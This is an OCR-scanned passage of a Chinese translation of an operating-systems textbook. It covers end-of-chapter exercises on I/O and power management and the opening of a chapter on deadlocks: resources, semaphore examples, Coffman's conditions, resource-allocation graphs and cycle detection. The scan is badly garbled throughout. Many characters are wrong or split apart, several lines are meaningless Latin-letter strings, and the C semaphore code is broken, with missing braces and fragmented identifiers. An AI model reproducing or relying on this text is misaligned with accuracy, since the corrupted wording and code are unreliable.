是 否 存在 对 于 第 一 个 参数 (hdc) 的 实际 需要 ? 如 果 存 在 ， 是 什 
A? 毕竟 ,矩形 的 坐标 作为 参数 而 显 式 地 指明 了 。 


41. 一 台 THINC 终 端 用 于 显示 一 个 网 页 ， 该 网 页 包含 一 个 动画 卡 
通 ， 卡 通 大 小 为 400x160 像 素 ， 以 每 秒 10 帧 的 速度 播放 。 显 示 该 卡通 
会 消耗 100Mbps 决 速 以 太 网 带宽 多 大 的 部 分 ? 


42. 在 一 次 测试 中 ，THINC 系 统 被 观测 到 对 于 1Mbps 的 网 络 工作 民 
好 。 在 多 用 户 的 情形 中 会 有 问题 吗 ? 提示 : 考 虚 大量 的 用 户 在 观看 时 
间 表 排 好 的 TV 节目 ， 并 且 相 同 数目 的 用 户 在 浏览 万 维 网 。 


43. 如 条 一 个 CPU 的 最 大 电压 V 被 削减 到 Vn， 那 么 它 的 功率 消耗 将 
下 降 到 其 原始 值 的 Wn? ， 并 且 它 的 时 钟 速度 下 降 到 其 原始 值 的 n。 假 
设 一 个 用 户 以 每 秒 1 个 字符 的 速度 键入 字符 ， 处 理 每 个 字符 所 需要 的 
CPU 时 间 征 100ms，n 的 最 优 值 是 多 少 ? 与 不 削减 电压 相 比 ， 以 百分比 


表示 相应 的 能 量 市 约 了 多 少 ? 假设 空 则 的 CPU 完 全 不 消耗 能 量 。 


44. 一 台 笔 记 本 电脑 被 设置 成 最 大 地 利用 功率 节省 特性 ， 包 括 在 一 
段 时 间 不 活动 之 后 关闭 显示 器 和 硬盘。 一 个 用 户 有 时 在 文本 模式 下 运 
行 UNIX 程 序 ， 而 在 其 他 时 间 使 用 X 窗 口 系统 。 她 惊讶 地 发 现 当 她 使 用 
仅 限 文本 模式 的 程序 时 ， 电 池 的 寿命 相当 长 。 为 什么 ? 


45. 编 写 一 个 程序 模拟 稳定 的 存储 器 ， 在 你 的 磁盘 上 使 用 两 个 大 型 
的 固定 长 度 的 文件 来 模拟 两 块 磁盘 。 


46 .编写 一 个 程序 实现 三 个 磁 弄 臂 调 度 算法 。 编 写 一 个 张 动 程序 随 
机 生成 一 个 柱 面 号 序列 《0~999) ， 针 对 该 序列 运行 三 个 算法 并 且 打 
印 出 在 三 个 算法 中 磁盘 臂 需要 来 回 移动 的 总 距离 〈 柱 面 数 ) 。 


47. 编 写 一 个 程序 使 用 单一 的 时 钟 实现 多 个 定时 器 。 该 程序 的 输入 
包含 四 种 命令 (S<int> ,TE<int>,P) 的 序列 : S<int> 设 置 当 前 时 
刻 为 <int> ;TI 是 一 个 时 钟 滴答 ; E<int> 调度 一 个 信号 在 <int> 时刻 
发 生 ; P 打 印 出 当前 时 刻 、 下 一 信号 和 时 钟头 的 值 。 当 唤起 一 个 信和 号 
时 ， 你 的 程序 还 应 该 打印 出 一 条 语句 。 


Bor Tei 


在 计算 机 系统 中 有 很 多 独占 性 的 资源 ， 在 任 一 时 刻 它们 都 只 能 被 
一 个 进程 使 用 。 管 见 的 有 打印 机 、 磁 市 以 及 系统 内 部 表 中 的 表 项 。 打 
印 机 同时 让 两 个 进程 打印 将 造成 混乱 的 打印 结果 ; 两 个 进程 同时 使 用 
同一 文件 系统 表 中 的 表 项 会 引起 文件 系统 的 瘫痪 。 正 因为 如 此 ， 操 作 
系统 都 具有 授权 一 个 进程 (临时 排他 地 访问 某 一 种 资源 的 能 


在 很 多 应 用 中 ， 需 要 一 个 进程 排他 性 地 访问 若干 种 资源 而 不 是 一 
种 。 例 如 ， 有 两 个 进程 准备 分 别 将 扫描 的 文档 记录 到 CD 上。 进程 A 请 
求 使 用 扫描 仪 ， 并 被 授权 使 用 。 但 进程 B 首 先 请 求 CD 刻录 机 ， 也 被 授 
权 使 用 。 现 在 ，A 请 求 使 用 CD 刻录 机 ， 但 该 请 求 在 B 释 放 CD 刻 录 机 前 
会 被 拒绝 。 但 是 ， 进 程 B 非 但 不 放弃 CD 刻录 机 ， 而 且 去 请 求 扫描 仪 。 
这 时 ， 两 个 进程 都 被 阻塞 ， 并 日 一 直 处 于 这 样 的 状态 。 这 种 状况 就 是 
死 锁 (deadlock) ° 


死 锁 也 可 能 发 生 在 机 器 之 间 。 例 如 ， 许 多 办 公 室 中 都 用 计算 机 连 
成 局 域 网 ， 扫 描 仪 、CD 刻 未 机 、 打 印 机 和 磁带 机 等 设备 也 连接 到 局 域 
网 上 ， 成 为 共享 货源 ， 供 局 域 网 中 任何 机 严 上 的 人 和 用 户 使 用 。 如 采 
这 些 设备 可 以 远程 保留 给 某 一 个 用 户 《比如 ， 在 用 户 家 里 的 机 右 使 用 
这 些 设备 }) ， 那 么 ， 也 会 发 生 上 面 描述 的 死 锁 现 象 。 更 复杂 的 情形 会 
引起 三 个 、 四 个 或 更 多 设备 和 用 户 发 生死 锁 。 


除了 请 求 独 占 性 的 VO 设备 之 外 ， 别 的 情况 也 有 可 能 引起 死 锁 。 例 
如 ， 在 一 个 数据 库 系 统 中 ， 为 了 避免 范 争 ， 可 对 奉 干 记录 加 锁 。 如 果 
进程 A 对 记录 R1 加 了 锁 ， 进 程 B 对 记录 R2 加 了 锁 ， 接 着 ， 这 两 个 进程 
又 试图 各 目 把 对 方 的 记录 也 加 锁 ， 这 时 也 会 产生 死 锁 。 所 以 ， 软 硬件 
资源 都 有 可 能 出 现 死 锁 。 


在 本 章 里 ， 我 们 准备 考察 几 类 死 锁 ， 了 解 它们 是 如 何 出 现 的 ， 学 
习 防 止 或 者 避免 死 锁 的 办 法 。 尽 管 我 们 所 讨论 的 是 操作 系统 环境 下 出 
现 的 死 锁 问题 ， 但 是 在 数据 库 系统 和 许多 计算 机 应 用 环境 中 都 可 能 产 
生死 锁 ， 所 以 我 们 所 介绍 的 内 容 实 际 上 可 以 应 用 到 包含 多 个 进程 的 系 
统 中 。 有 很 多 有 关 死 锁 的 著作 ，《Operating Systems Review》 中 列 出 
了 两 本 参考 书 (Newton,1979;Zobel,1983) ， 有 兴趣 的 读者 可 以 参考 这 
两 本 书 。 死 锁 方 面 的 大 多 数 研 究 工 作 在 1980 年 以 前 就 完成 了 ， 尽 管 所 
列 的 参考 文献 有 些 老 ， 但 是 这 些 内 容 依然 是 很 有 用 的 。 


6.1 资源 


大 部 分 死 锁 都 和 资源 相关 ， 所 以 我 们 首先 来 看 看 资源 是 什么 。 在 
进程 对 设备 、 文 件 等 取得 了 排他 性 访问 权时 ， 有 可 能 会 出 现 死 锁 。 为 
了 尽 可 能 使 天 于 死 锁 的 讨论 通用 ， 我 们 把 这 类 需要 排他 性 使 用 的 对 象 
称 为 资源 (resource) 。 资 源 可 以 是 硬件 设备 《如 磁带 机 ) 或 是 一 组 信 
上 (如 数据 库 中 一 个 加 锁 的 记录 ) 。 通 常 在 计算 机 中 有 多 种 (可 获取 


的 ) 资源 。 一 些 类 型 的 资源 会 有 若干 个 相同 的 实例 ， 如 三 全 磁带 机 。 
当 某 一 俯 源 有 才干 实 例 时 ， 其 中 任何 一 个 都 可 以 用 来 满足 对 资源 的 请 
求 。 位 单 来 说 ， 资 源 束 古 随 着 时 间 的 推移， 必须 能 获得 、 使 用 以 及 释 
放 的 任何 东西 。 


6.1.1 可 抢占 资源 和 不 可 抢占 资源 


资源 分 为 两 类 ， 可 抢占 的 和 不 可 抢占 的 。 可 抢占 资源 
(preemptable resource) 可 以 从 拥有 它 的 进程 中 抢占 而 不 会 产生 任何 
副作用 ， 存 储 絮 束 古 一 类 可 抢占 的 资源 。 例 如 ， 一 个 系统 拥有 256MB 
的 用 户 内 存 和 一 台 打 印 机 。 如 有 果 有 两 个 256MB 内 存 的 进程 都 想 进 行 打 
印 ， 进 程 A 请 求 并 获得 了 打印 机 ， 然 后 开始 计算 要 打印 的 值 。 在 它 没 
有 完成 计算 任务 之 前 ， 它 的 时 间 片 就 已 经 用 完 并 被 换 出 。 


然后 ， 进 程 B 开 始 运 行 并 请 求 打 印 机 ， 但 是 没有 成 功 。 这 时 有 漠 
在 的 死 锁 危险 。 由 于 进程 A 拥 有 打印 机 ， 而 进程 B 占 有 了 内 存 ， 两 个 进 
程 都 缺少 男 外 一 个 进程 拥有 的 资源 ， 所 以 任何 一 个 都 不 能 继续 执行 。 
不 过 ， 和 至 运 的 是 通过 把 进程 B 换 出 内 存 、 把 进程 A 换 入 内 存 束 可 以 实现 
抢占 进程 B 的 内 存 。 这 样 ， 进 程 A 继 续 运 行 并 执行 打印 任务 ， 然 后 释放 
打印 机 。 在 这 个 过 程 中 不 会 产生 死 锁 。 


相反 ， 不 可 抢占 资源 (nonpreemptable resource) 是 指 在 不 引起 相 
天 的 计算 失败 的 情况 下 ， 无 法 把 它 从 占有 它 的 进程 处 抢占 过 来 。 如 果 
一 个 进程 已 开始 刻 副 ， 突 然 将 CD 刻录 机 分 配给 男 一 个 进程 ， 那 么 将 划 
坏 CD 强 。 在 任何 时 刻 CD 刻 永 机 都 是 不 可 抢占 的 。 


总 的 来 说 ， 死 锁 和 不 可 抢占 资源 有 关 ， 有 关 可 抢占 资源 的 潜在 死 
锁 通 单 可 以 通过 在 进程 之 间 重 新 分 配 资源 而 化 解 。 所 以 ， 我 们 的 重点 
放 在 不 可 抢占 资源 上 。 


使 用 一 个 资源 所 需要 的 事件 顺序 可 以 用 抽象 的 形式 表示 如 下 : 


1) 请 求 资源 。 
2) 使 用 资源 。 
3) 释 放 资 源 。 


香 请 求 时 资源 不 可 用 ， 则 请 求 进 程 被 过 等 待 。 在 一 些 操作 系统 
中 ， 资 源 请 求 失败 时 进程 会 目 动 被 阻塞 ， 在 货源 可 用 时 再 唤醒 它 。 在 
其 他 的 系统 中 ， 资 源 请 求 失 败 会 返回 一 个 错误 代码 ， 请 求 的 进程 会 等 
竺 一段 时 间 ， 然 后 重 试 。 


当 一 个 进程 请 求 货 源 失 败 时 ， 它 通常 会 处 于 这 样 一 个 小 循环 中 : 
请 求 唤 源 ， 体 眠 ， 再 请 求 。 这 个 进程 虽然 没有 被 阻塞 ， 但 是 从 各 角度 
来 说 ， 它 不 能 做 任何 有 价值 的 工作 ， 实 际 和 阻塞 状态 一 样 。 在 后 面 的 


讨论 中 ， 我 们 假设 : MARE ETA SRA, HA iat 
状态 。 


请 求 资源 的 过 程 是 非常 依赖 于 系统 的 。 在 某 些 系统 中 ， 提 供 了 
request 系 统 调用 ， 用 于 允许 进程 资源 请 求 。 在 为 一 些 系统 中 ， 操 作 系 
统 只 知道 资源 是 一 些 特殊 文件 ， 在 任何 时 刻 它 们 最 多 只 能 被 一 个 进程 
打开 。 一 般 情 况 下 ， 这 些 特殊 文件 用 open 调 用 打开 。 如 果 这 些 文 件 正 
在 被 使 用 ， 那 么 ， 发 出 open 调 用 的 进程 会 被 阻塞， 一 直到 文件 的 当前 
使 用 者 关闭 该 文件 为 止 。 


6.1.2 ”资源 获取 


对 于 数据 库 系 统 中 的 记录 这 类 资源 ， 应 该 由 用 户 进程 来 管理 其 使 
用 。 一 种 允许 用 户 管理 资源 的 可 能 方法 是 为 每 一 个 资源 配置 一 个 信和 号 
量 。 这 些 信号 量 都 被 初始 化 为 1。 互 斥 信 号 量 也 能 起 到 相同 的 作用 。 上 
述 的 三 个 步骤 可 以 实现 为 信号 量 的 down 操 作 来 获取 资源 ， 使 用 资源 ， 
最 后 使 用 up 操作 来 释放 人 资源。 这 三 个 步 又 如 图 6-1a 所 示 。 


typedef int semaphore; 
semaphore resource _ 1; 


void process_A(void) { 
down(&resource _ 1); 
use_resource _1( ); 
up(&resource _ 1); 


typedef int semaphore; 
semaphore resource _1; 
semaphore resource _ 2; 


void process _A(void) { 
down(&resource _ 1); 
down(&resource _ 2); 
use_both_resources( ); 
up(&resource _ 2); 
up(&resource _ 1); 


b) 


Al 6-1 使 用 信号 量 保护 资源 ，a) 一 个 资源 ，b) 两 个 资源 


有 了 时候 ， 进 程 需 要 两 个 或 更 多 的 资源 ， 它 们 可 以 顺序 获得 ， 如 图 6- 
1b 所 示 。 如 果 需 要 两 个 以 上 的 资源 ， 通 常 都 是 连续 获取 。 


到 目前 为 上 上， 进程 的 执行 不 会 出 现 问题 。 在 只 有 一 个 进程 参与 
时 ， 所 有 的 工作 都 可 以 很 好 地 完成 。 当 然 ， 如 果 只 有 一 个 进程 ， 吏 没 
有 必要 这 么 慎重 地 获取 资源 ， 因 为 不 存在 货源 竞争 。 


现在 考虑 两 个 进程 (AMB) 以 及 两 个 资源 的 情况 。 图 6-2 描 述 了 两 
种 不 同 的 方式 。 在 图 6-2a 中 ， 两 个 进程 以 相同 的 次 序 请 求 资源 ;在 图 6- 
2b 中 ， 它 们 以 不 同 的 次 序 请 求 资源 。 这 种 不 同 看 似 微不足道 ， 实 则 不 
RR ° 


在 图 6-2a 中 ， 其 中 一 个 进程 先 于 为 一 个 进程 获取 资源 。 这 个 进程 能 
够 成 功 地 获取 第 二 个 资源 并 完成 它 的 任务 。 如 果 男 一 个 进程 想 在 第 一 
个 质 源 被 释放 之 前 获取 该 资产， 那么 它 会 由 于 资产 加 锁 而 被 阻塞 ， 直 
到 该 资源 可 用 为 止 。 


图 6-2b 的 情况 束 不 同 了 。 可 能 其 中 一 个 进程 获取 了 两 个 资源 并 有 效 

地 阻塞 了 夯 外 一 个 进程 ， 直 到 它 使 用 完 这 两 个 唤 源 为 止 。 但 是 ， 也 有 

可 能 进程 A 获 取 了 资源 1， 进 程 B 获 取 了 资源 2， 每 个 进程 如 采 都 想 请 求 

男 一 个 资源 整 会 被 蛆 塞 ， 那么 ， 每 个 进程 部 无 法 继续 运行 。 这 种 情况 
Bie TCD ° 


typedef int semaphore; 
semaphore resource _ 1; semaphore resource _ 1; 
semaphore resource _ 2; semaphore resource _ 2; 


void process_A(void) { void process _A(void) { 
down(&resource _ 1); down(&resource _ 1); 
down(&resource _ 2); down(&resource _ 2); 
use_both_resources( ); use_both_resources( ); 
up(&resource _ 2); up(&resource _ 2); 


up(&resource _ 1); up(&resource _ 1); 


} } 


void process _B(void) { void process _B(void) { 
down(&resource _ 1); down(&resource _ 2); 
down(&resource _ 2); down(&resource _ 1); 
use_both_resources( ); use_both_resources( ); 
up(&resource _ 2); up(&resource _ 1); 
up(&resource _ 1); up(&resource _ 2); 


a) b) 


Al 6-2 9 无 死 锁 的 编码 ;pbD) 有 可 能 出 现 死 笑 的 编码 


这 里 我 们 可 以 看 到 一 个 编码 风格 上 的 细微 差别 〈 哪 一 个 资源 先 获 
取 ) 造成 了 可 以 执行 的 程序 和 不 能 执行 而 且 无 法 检测 错误 的 程序 之 间 
的 差别 。 因 为 死 锁 是 非常 容易 发 生 的 ， 所 以 有 很 多 人 研究 如 何 处 理 这 
种 情况 。 这 一 章 束 会 详细 讨论 死 锁 问题 ， 并 给 出 一 些 对 策 。 


6.2 ”和 死 锁 概述 


死 锁 的 规范 定义 如 下 : 


如 果 一 个 进程 集合 中 的 每 个 进程 都 在 等 待 只 能 由 该 进程 集合 中 的 
其 他 进程 才能 引发 的 事件 ， 那 么 ， 该 进程 集合 就 是 死 锁 的 。 


由 于 所 有 的 进程 都 在 等 待 ， 所 以 没有 一 个 进程 能 引发 可 以 唤醒 该 
进程 集合 中 的 其 他 进程 的 事件 ， 这 样 ， 所 有 的 进程 都 只 好 无 限期 等 待 
下 去 。 在 这 一 模型 中 ， 我 们 假设 进程 只 人 台 有 一 个 线程 ， 并 且 被 阻塞 的 
进程 无 法 由 中 断 唤醒 。 无 中 断 条 件 使 死 锁 的 进程 不 能 被 时 钟 中 断 等 唤 
醒 ， 从 而 不 能 引发 释放 该 集合 中 的 其 他 进程 的 事件 。 


在 大 多 数 情 况 下 ， 每 个 进程 所 等 竺 的 事件 是 释放 该 进程 集合 中 其 
他 进程 所 占有 的 资源 。 换 言 之 ， 这 个 死 锁 进程 集合 中 的 每 一 个 进程 都 
等待 另 一 个 死 锁 的 进程 已 经 占有 的 换 源 。 但 是 由 于 所 有 进程 都 不 能 
行 ， 


ay 


它们 中 的 任何 一 个 都 无 法 释放 资源 ， 所 以 没有 一 个 进程 可 以 被 
唤醒 。 进 程 的 数量 以 及 占有 或 者 请 求 的 资源 数量 和 种 类 都 是 无 关 紧 要 
的 ， 而 且 无 论 资源 是 何 种 类 型 (软件 或 者 硬件 ) 都 会 发 生 这 种 结果 © 
这 种 死 锁 称 为 资源 死 锁 (resource deadlock) 。 这 是 最 常见 的 类 型 ， 但 
并 不 是 惟一 的 类 型 。 本 万 我 们 会 详细 介绍 一 下 资源 死 锁 ， 在 本 章 末 再 
概述 其 他 类 型 的 死 锁 。 


运 


$ 


6.2.1 ”资源 死 锁 的 条 件 


Coffman A (1971) 总 结 了 发 生 (资源 ， 死 锁 的 四 个 必要 条 
TF: 


1) 互 不 条 件 。 每 个 资源 要 么 已 经 分 配给 了 一 个 进程 ， BAW En 
用 的 。 


2) 占 有 和 等 每 条 件 。 已 经 得 到 了 某 个 资源 的 进程 可 以 再 请 求 新 的 


3) 不 可 抢占 条 件 。 已 经 分 配给 一 个 进程 的 资源 不 能 强制 性 地 被 抢 
占 ， 它 只 能 被 占有 它 的 进程 显 式 地 释放 。 


4) 环 路 等 竺 条件。 和 死 锁 发 生 时 ， 系 统 中 一 定 有 由 两 个 或 两 个 以 上 
的 进程 组 成 的 一 条 环 路 ， 该 环 路 中 的 每 个 进程 都 在 等 待 着 下 一 个 进程 
所 占有 的 资源 。 


死 锁 发 生 时 ， 以 上 四 个 条 件 一 定 是 同时 满足 的 。 如 果 其 中 任何 一 
个 条 件 不 成 立 ， 死 锁 就 不 会 发 生 。 


值得 注意 的 是 ， 每 一 个 条 件 部 与 系统 的 一 种 可 选集 略 相 天。 一 种 
资源 能 否 同时 分 配给 不 同 的 进程 ?一 个 进程 能 否 在 占有 一 个 资源 的 同 


时 请 求 男 一 个 资源 ? 资源 能 否 被 抢占 ? 循环 等 待 环 路 是 否 存在 ? 我们 
在 后 面 会 看 到 怎样 通过 破坏 上 述 条 件 来 预防 死 锁 。 


6.2.2 IEMET 


Holt (1972) 指出 如 何 用 有 向 图 建立 上 述 四 个 条 件 的 模型 。 在 有 向 
图 中 有 两 类 节点 : 用 圆 形 表 示 的 进程 ， 用 方形 表示 的 资源 。 从 资源 市 
点 到 进程 节点 的 有 向 边 代 表 该 资源 已 被 请 求 、 授 权 并 被 进程 占用 。 在 
图 6-3a 中 ， 当 前 资源 R 正 被 进程 A 占用 。 


由 进程 节点 到 资源 太 点 的 有 向 边 表明 当前 进程 正在 请 求 该 资源 ， 
并 且 该 进程 已 被 阻塞 ， 处 于 等 待 该 资源 的 状态 。 在 图 6-3b 中 ， 进 程 B 正 
等 待 着 资源 S9。 图 6-3c 说 明 进 入 了 死 锁 状 态 : 进程 C 等 待 着 资源 TI， 资 源 
TI 被 进程 D 占 用 着 ， 进 程 D 又 等 待 着 由 进程 C 占 用 着 的 资源 U。 这 样 两 个 
进程 都 得 等 竺 下去。 图 中 的 环 表示 与 这 些 进程 和 资源 有 关 的 死 锁 。 在 
本 例 中 ， 环 是 C-TD-U-C ° 


Q 


a) b) 


Al 6-3 WEDER: a GAS EUR: b) 请 求 一 个 质 源 ;，o 死 锁 


我 们 再 看 看 使 用 资源 分 配 图 的 方法 。 假 设 有 三 个 进程 (A, B 
C) 及 三 个 资源 (R, S, T) 。 三 个 进程 对 资源 的 请 求 和 释放 如 图 6-4a 
一 图 6-4c 所 示 。 操 作 系 统 可 以 随时 选择 任 一 非 阻 塞 进 程 运行 ， 所 以 它 可 
选择 A 运 行 一 直到 A 完 成 其 所 有 工作 ， 接 着 运行 B， 最 后 运行 C。 


A B C 


请 求 R 请 求 S WORT 
请 求 S 请 求 T 请 求 R 
释放 R 释放 S 释放 T 
释放 S FET 释放 R 


a) b) 
1. A 请 求 R 


c) 
ABO OO OO 
4. A 请 求 S 
a rR] [s] E] s] [7] Gik 

e) g) 


d) 


A) (8) © 


h) i) 


1. A 请 求 R 

2.C 请 求 T 

3. A 请 求 S 

4. C 请 求 B 

5. A 释放 R 

6. A 释放 S 
无 死 锁 
k) 


图 6-4 一 个 死 锁 是 如 何 产 生 以 及 如 何 避 免 的 例子 


上 述 的 执行 次 序 不 会 引起 死 锁 《因为 没有 资源 的 竞争 ) ， 但 程序 
也 没有 任何 并 行 性 。 进 程 在 执行 过 程 中 ， 不 仅 要 请 求 和 释放 资产， 还 
要 做 计算 或 者 输入 /输出 工作 。 如 来 进程 是 串 行 运行 ， 不 会 出 现 当 一 个 
进程 等 待 O 时 让 另 一 个 进程 占用 CPU 进行 计算 的 情形 。 因 此 ， 严 格 的 
串 行 操 作 有 可 能 不 是 最 优 的 。 不 过 ， 如 采 所 有 的 进程 都 不 执行 IO 操 
作 ， 那 么 最 短 作业 优先 调度 会 比 轮转 调度 优越 ， 所 以 在 这 种 情况 下 ， 


捉 行 运行 有 可 能 是 最 优 的 。 


如 采 假 设 进程 操作 包含 VO 和 计算 ， 那么 轮转 法 是 一 种 合适 的 调度 
算法 。 对 资源 请 求 的 次 序 可 能 会 如 图 6-4d 所 示 。 假如 按 这 个 次 序 执行 ， 
图 6-4e 一 岁 6-4j 是 相应 的 唤 源 分 配 匈 。 在 出 现 请 求 4 后 ， 如 图 6-4h 所 示 ， 
进程 A 被 阻塞 等 待 S， 后 续 两 步 中 的 B 和 C 也 会 被 阻塞 ， 结 有 末 如 图 6-4j 所 
示 ， 产 生 环 路 并 导致 死 锁 。 


不 过 正如 前 面 所 讨论 的 ， 并 没有 规定 操作 系统 要 按照 某 一 特定 的 
次 序 来 运行 这 些 进 程 。 特 别 地 ， 对 于 一 个 有 可 能 引起 死 锁 的 资源 请 
求 ， 操 作 系 统 可 以 干脆 不 批准 请 求 ， 并 把 该 进程 挂 起 ( 即 不 参与 调 
E) 一 直到 处 于 安全 状态 为 止 。 在 图 6-4 中 ， 假 设 操作 系统 知道 有 引起 
死 锁 的 可 能 ， 那 么 它 可 以 不 把 资源 S 分 配给 B， 这 样 B 被 挂 起 。 假 如 只 
运行 进程 A 和 C， 那 么 资源 请 求 和 释放 的 过 程 会 如 图 6-4k 所 示 ， 而 不 是 
如 图 6-4d 所 示 。 这 一 过 程 的 资源 分 配 图 在 图 6-41 一 图 6-4q 中 给 出 ， 其 中 
没有 死 锁 产生 。 


在 第 q 步 执行 完 后 ， 就 可 以 把 资源 S 分 配给 B 了 ， 因 为 A 已 经 完成 ， 
而 且 C 获 得 了 它 所 需要 的 所 有 资源 。 尽 管 B 会 因为 请 求 T 而 等 待 ， 但 是 
不 会 引起 死 锁 ，B 只 需要 等 待 C 结 


在 本 章 后 面 我 们 将 考察 一 个 具体 的 算法 ， 用 以 做 出 不 会 引起 死 锁 
的 资源 分 配 决策 。 在 这 里 需要 说 明 的 是 ， 资 源 分 配 图 可 以 用 作 一 种 分 
析 工 具 ， 考 察 对 一 给 定 的 请 求 /释放 的 序列 是 否 会 引起 死 锁 。 只 需要 按 
照 请 求 和 释放 的 次 序 一 步 步 进行 ， 每 一 步 之 后 都 检查 图 中 是 否 包括 了 
TER WRAY, BAMA; 反之 ， 则 没有 死 锁 。 在 我 们 的 例 
子 中 ， 虽 然 只 和 同一 类 资源 有 天， 而 且 只 包含 一 个 实例 ， 但 是 上 面 的 
原理 完全 可 以 推广 到 有 多 种 货源 并 含有 者 干 个 实例 的 情况 中 去 
(Holt,1972) ° 


总 而 言 之 ， 有 四 种 处 理 死 锁 的 策略 ; 
1) 忽 略 该 问题 。 也 许 如 果 你 名 上 略 它 ， 它 也 会 忽略 你 。 


2) 检 测 死 锁 并 恢复 。 让 死 锁 发 生 ， 检 测 它 们 是 否 发 生 ， 一 旦 发 生死 
峰 ， 采 取 行 动 解决 问题 。 


3) 仔 细 对 资源 进行 分 配 ， 动 仿 地 避免 死 锁 。 
4) 通 过 破坏 引起 死 锁 的 四 个 必要 条 件 之 一 ， 防 止 死 锁 的 产生 。 


下 面 四 节 将 分 别 讨论 这 四 种 方法 。 


6.3 ESRI 


HT ART EES SYS: FESS PH, RIRKA 
问题 发 生 趾 。 每 个 人 对 该 方法 的 看 法 都 不 相同 。 数 学 家 认为 这 种 方法 
根本 不 能 接受 ， 不 论 代价 有 和 多大， 都 要 彻底 防止 死 锁 的 产生 ;工程 师 
们 想 要 了 解 死 锁 发 生 的 频 度 、 系 统 因 各 种 原因 月 演 的 发 生 次 数 以 及 死 
锁 的 严重 性 。 如 采 死 锁 平 均 每 5 年 发 生 一 次 ， 而 每 个 月 系统 都 会 因 硬件 
Whe ` SHE as a REL PRE A A Ain IK, PARERI LIE 
师 不 会 以 性 能 损失 和 可 用 性 的 代价 去 防止 死 锁 。 


为 了 能 够 让 这 一 对 比 更 具体 ， 考 虑 如 下 情况 的 一 个 操作 系统 : 当 
一 个 open 系 统 调用 因 物 理 设备 (例如 CD-ROM 驱 动 程序 或 者 打印 机 ，) 
忙 而 不 能 得 到 响应 的 时 候 ， 操 作 系统 会 阻塞 调用 该 系统 调用 的 进程 。 
通常 是 由 设备 驱动 来 决定 在 这 种 情况 下 应 该 采取 何 种 措施 。 显 然 , 阻 
塞 或 者 返回 一 个 错误 代码 是 两 种 选择 。 如 果 一 个 进程 成 功 地 打开 了 
CD-ROM 了 驱动 器 ， 而 男 一 个 进程 成 功 地 打开 了 打印 机 ， 这 时 每 个 进程 
都 会 试图 去 打开 另外 一 个 设备 ， 然 后 系统 会 阻塞 这 种 尝试 ， 从 而 发 生 
死 锁 。 现 有 系统 很 少 能 够 检测 到 这 种 死 锁 。 


[1] 这 一 民间 传说 晕 无 道理 。 驶 乌 每 小 时 跑 60 公 里 ， 为 了 得 到 一 顿 丰盛 
的 晚餐 ， 它 一 脚 的 力量 足以 踊 死 一 头 狮子 。 


6.4 FEB RM ASCE KS 


第 二 种 技术 是 死 锁 检 测 和 恢复 。 在 使 用 这 种 技术 时 ， 系 统 并 不 试 
图 阻止 死 锁 的 产生 ， 而 是 允许 死 锁 发 生 ， 当 检测 到 和 死 锁 发 生 后 ， 采 取 
措施 进行 恢复 。 本 万 我 们 将 考察 检测 死 锁 的 儿 种 方法 以 及 恢复 死 锁 的 
几 种 方法 B 


6.4.1 每 种 类 型 一 个 资源 的 死 锁 检测 


我 们 从 最 人 简单 的 例子 开始 ， 即 每 种 类 型 只 有 一 个 俯 源 。 这 样 的 系 
统 可 能 有 一 台 扫 摘 仪 、 一 台 CD 刻 条 机 、 一 台 绘 图 仪 和 一 台 磁 市 机 ， 但 
每 种 类 型 的 资源 都 不 超过 一 个 ， 即 排除 了 同时 有 两 台 打 印 机 的 情况 。 
稍 后 我 们 将 用 另 一 种 方法 来 解决 两 侣 打印 机 的 情况 。 


可 以 对 这 样 的 系统 构造 一 张 资 源 分 配 图 ， 如 图 6-3 所 示 。 如 末 这 张 
图 包 售 了 一 个 或 一 个 以 上 的 环 ， 那 么 死 锁 就 存 在 。 在 此 环 中 的 任何 一 
个 进程 都 是 死 锁 进 程 。 如 宁 没 有 这 样 的 环 ， 系 统 吕 没有 发 生死 锁 。 


我 们 讨论 一 下 更 复杂 的 情况 ， 假 设 一 个 系统 包括 A 到 G 共 7 个 进 
程 ，R 到 W 共 6 种 资产。 资源 的 占有 情况 和 进程 对 资源 的 请 求情 况 如 
F: 


1)A 进 程 持 有 R 资 源 ， 且 需要 S 资 源 。 


2)B 进 程 不 持 有 任何 资源 ， 但 需要 T 资 源 。 


3)C 进 程 不 持 有 任何 资源 ， 但 需要 S 资 源 。 


4)D 进 程 持 有 U 资 源 ， 且 需要 S 资 源 和 T 资 源 。 


5)E 进 程 择 有 T 资 源 ， 且 需要 V 资 源 。 


6)EF 进 程 持 有 W 资 源 ， 且 需要 $ 资 源 。 


7)G 进 程 持 有 V 资 源 ， 且 需要 U 资 源 。 


问题 是 : “系统 是 人 否 存 在 死 锁 ? 如 采 存 在 的 话 ， 死 锁 涉 及 了 哪些 进 


要 回答 这 一 问题 ， 我 们 可 以 构造 一 张 贷 源 分 配 图 ， 如 图 6-5a 所 示 。 
可 以 直接 观察 到 这 张 图 中 包含 了 一 个 环 ， 如 图 6-5b 所 示 。 在 这 个 环 中 ， 
我 们 可 以 看 出 进程 D、E、G 已 经 死 锁 。 进 程 A、C、EF 没 有 死 锁 ， 这 是 
因为 可 把 S 资 源 分 配给 它们 中 的 任 一 个 ， 而 且 它 们 中 的 任 一 进程 完成 后 
都 能 释放 S， 于 是 其 他 两 个 进程 可 依次 执行 ， 直 至 执行 完毕 。 (请 注 
意 ， 为 了 让 这 个 例子 更 有 趣 ， 我 们 允许 进程 D 每 次 请 求 两 个 资源 。) 


Kl 6-5 a) 资 源 分 配 图 ; b) 从 a 中 抽取 的 环 


虽然 通过 观 穴 一 张 简 单 的 图 束 能 够 很 容易 地 找 出 死 锁 进 程 ， 但 为 


了 实用 ， 我 们 仍然 需要 一 个 正规 的 算法 来 检测 死 锁 。 众 所 周知 ， 有 很 
多 检测 有 向 图 环 路 的 方法 。 下 面 将 给 出 一 个 简单 的 算法 ， 这 种 算法 对 
有 问 图 进行 检测 ， 并 在 发 现 图 中 有 环 路 存在 或 无 环 路 时 结束 。 这 一 算 
法 使 用 了 数据 结构 L，L 代 表 一些 市 点 的 集合 。 在 这 一 算法 中 ， 对 已 经 


仿 查 过 的 弧 (有 向 边 ) 进行 标记 ， 以 免 重复 检查 。 
通过 执行 下 列 步 又 完成 上 述 算 法 : 
TD) 对 图 中 的 每 一 个 节点 N， 将 N 作 为 起 始点 执行 下 面 5 个 步骤 。 


2) 将 LL 初始 化 为 空 表 ， 并 清除 所 有 的 有 同 边 标记 。 
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两 次 。 如 果 是 ， 那 么 该 图 包含 了 一 个 环 〈 已 列 在 L 中 ) ， 算 法 结束 。 


4) 从 给 定 的 玉 点 开始 ， 检 测 是 否 存在 没有 标记 的 从 该 节点 出 发 的 弧 
